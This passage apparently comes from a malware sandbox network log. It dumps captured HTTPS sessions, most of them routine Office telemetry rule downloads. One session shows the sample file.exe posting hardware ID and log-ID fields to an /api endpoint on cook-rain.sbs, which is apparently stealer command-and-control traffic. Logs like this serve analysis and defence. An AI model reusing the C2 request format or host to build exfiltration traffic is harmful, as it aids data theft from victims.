                                                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095422Z-185f5d8b95crl6swhC1NYC3ueg0000000a4g00000000egn0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                30192.168.2.74973313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                x-ms-request-id: c6b0c23f-801e-0048-738c-3af3fb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095422Z-185f5d8b95cdtclvhC1NYC4rmc0000000a9g000000001epx
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                31192.168.2.74973413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095422Z-1777c6cb754mqztshC1TEB4mkc00000009f0000000007q6n
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                32192.168.2.74973513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095422Z-185f5d8b95ckwnflhC1NYCx9qs0000000a1000000000fewy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:22 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                33192.168.2.749736188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=5EBVPIAQK1UVGUOL8P
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 12850
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:22 UTC12850OUTData Raw: 2d 2d 35 45 42 56 50 49 41 51 4b 31 55 56 47 55 4f 4c 38 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 35 45 42 56 50 49 41 51 4b 31 55 56 47 55 4f 4c 38 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 45 42 56 50 49 41 51 4b 31 55 56 47 55 4f 4c 38 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                Data Ascii: --5EBVPIAQK1UVGUOL8PContent-Disposition: form-data; name="hwid"32809CE1B9805DCB63CFCF7E6C45F838--5EBVPIAQK1UVGUOL8PContent-Disposition: form-data; name="pid"2--5EBVPIAQK1UVGUOL8PContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                2024-11-20 09:54:23 UTC989INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=vucmvcbtobcvt5iflsflsaot0r; expires=Sun, 16-Mar-2025 03:41:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gut7EP514S28LsCoHgrxqHYpBV59HGoXWXFreMvX4448iz5IYhf8tp%2FD603sSFioetBg%2BUn04n%2BBeGr3FOz0bYgU%2BoYTThd%2BqFAQ9c%2FuwtSNPuyZSqdF9CJAx7Sp5Xa4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578eed4caa43b0-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13787&delivery_rate=1655328&cwnd=215&unsent_bytes=0&cid=a105dc0bff3e60be&ts=764&x=0"
                                                                                                                                                                                                2024-11-20 09:54:23 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-20 09:54:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                34192.168.2.74973713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:23 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 420
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095423Z-185f5d8b95ckwnflhC1NYCx9qs0000000a2000000000ct9c
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:23 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                35192.168.2.74973913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:23 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095423Z-185f5d8b95cmd8vfhC1NYC0g4000000005ug00000000hzh0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                36192.168.2.74974013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:23 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095423Z-r1d97b995774zjnrhC1TEBv1ww00000008m000000000ap22
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                37192.168.2.74973813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:23 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                x-ms-request-id: 538c974f-101e-0028-648c-3a8f64000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095423Z-r1d97b99577gg97qhC1TEBcrf400000008hg000000005whc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                38192.168.2.74974113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:23 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 423
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095423Z-1777c6cb754ww792hC1TEBzqu400000009b000000000317b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
